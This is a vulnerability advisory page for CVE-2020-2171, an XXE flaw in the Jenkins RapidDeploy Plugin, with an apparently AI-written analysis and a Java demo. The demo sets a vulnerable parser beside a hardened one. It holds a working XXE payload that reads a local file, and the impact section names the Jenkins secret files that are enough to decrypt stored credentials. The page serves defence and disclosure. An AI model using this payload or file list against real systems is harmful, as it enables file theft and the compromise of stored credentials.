VYPR
High severity · NVD Advisory · Published Mar 25, 2020 · Updated Aug 4, 2024

CVE-2020-2171

Description

Jenkins RapidDeploy Plugin 4.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Jenkins RapidDeploy Plugin 4.2 and earlier fails to disable XML external entity processing, enabling XXE attacks.

Vulnerability

Analysis

Jenkins RapidDeploy Plugin versions 4.2 and earlier do not configure their XML parser to prevent XML external entity (XXE) attacks [1][2]. The parser therefore resolves external entities declared in the DOCTYPE of an input document, a well-known weakness class (CWE-611). The root cause is that the plugin leaves the parser at its JDK defaults instead of disabling DTD processing and external entity resolution.

Exploitation

An attacker exploits this by getting the plugin to parse a crafted XML document whose DTD declares an external entity, for example a SYSTEM entity pointing at a local file or an internal URL, and then references it in element content. The Jenkins advisory identifies the input files of the plugin's package import step as the parsed input, so the precondition is control over that input: the ability to configure a job that uses the step, or to place files in its workspace (for instance through the source repository the job checks out). No Jenkins privilege beyond that control is required; the attack is simply a malicious XML file in a project or build step that the plugin parses.
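The weak parser configuration beside the hardened one, with a constructed payload of the kind described above, as an added example. This is illustration code written for this page, not the RapidDeploy plugin's source: the class and method names, the `<package>` payload shape and the temporary file standing in for a controller secret are assumptions; the feature and attribute names are the standard JAXP/Xerces ones.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

/**
 * Demonstrates the bug class behind CVE-2020-2171: a DocumentBuilderFactory
 * left at JDK defaults resolves external entities, so an attacker-controlled
 * XML file can pull local files into the parsed document.
 *
 * Added illustration code, not the RapidDeploy plugin's own source. The method
 * names and the "package descriptor" payload shape are assumptions for the demo.
 */
public class XxeDemo {

    /** Parser as a plugin gets it by default: DOCTYPE allowed, external entities fetched. */
    static Document parseVulnerable(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        DocumentBuilder b = f.newDocumentBuilder();
        return b.parse(new InputSource(new StringReader(xml)));
    }

    /** Parser with external entity resolution disabled, the kind of change the fix describes. */
    static Document parseHardened(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any DOCTYPE: the payload can only declare entities through a DTD,
        // so this single setting already makes the parse fail with a SAXParseException.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth in case a later change has to allow DOCTYPE again.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        DocumentBuilder b = f.newDocumentBuilder();
        return b.parse(new InputSource(new StringReader(xml)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for a secret file on the Jenkins controller.
        Path secret = Files.createTempFile("jenkins-secret", ".key");
        Files.write(secret, "TOP-SECRET-KEY-MATERIAL".getBytes(StandardCharsets.UTF_8));

        // Constructed payload: the XML file the attacker controls. The SYSTEM entity
        // points at a local file; on expansion its contents land inside <name>.
        String payload =
            "<?xml version=\"1.0\"?>\n"
          + "<!DOCTYPE package [\n"
          + "  <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">\n"
          + "]>\n"
          + "<package><name>&xxe;</name></package>";

        Document d = parseVulnerable(payload);
        String leaked = d.getElementsByTagName("name").item(0).getTextContent();
        System.out.println("vulnerable parser read: " + leaked);

        try {
            parseHardened(payload);
            System.out.println("hardened parser accepted the payload (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected it: " + e.getMessage());
        }
        Files.deleteIfExists(secret);
    }
}
```

Run it with `javac XxeDemo.java && java XxeDemo`: the first parse prints the temp file's contents, the second fails at the DOCTYPE. The same SYSTEM entity with an `http://` URL is the SSRF variant mentioned below; disallowing DOCTYPE blocks both.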

Impact

Successful exploitation lets the attacker read arbitrary files that the Jenkins process can access and return their contents in the parsed document, including credentials, configuration files and secret keys. Reading the controller's secrets/master.key and secrets/hudson.util.Secret together with credentials.xml is enough to decrypt stored credentials, so exposure can extend to every system Jenkins holds credentials for. Depending on the entity target, the attacker may also perform server-side request forgery (SSRF) against hosts reachable from the controller, or cause a denial of service through entity expansion. Taken together, this can lead to compromise of the Jenkins instance and of the secrets it manages.

Mitigation

The vulnerability is fixed in RapidDeploy Plugin version 4.2.1, which disables external entity resolution for the plugin's XML parser [2]. Users should update to 4.2.1 or later promptly and confirm the installed version in the Jenkins plugin manager. The advisories mention no workaround; until the update is applied, restricting who can configure jobs that use the plugin and who can modify their input files limits exposure but does not remove it. The CVE is not listed on the CISA Known Exploited Vulnerabilities Catalog.

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: org.jenkins-ci.plugins:rapiddeploy-jenkins (Maven)
Affected versions: < 4.2.1
Patched versions: 4.2.1
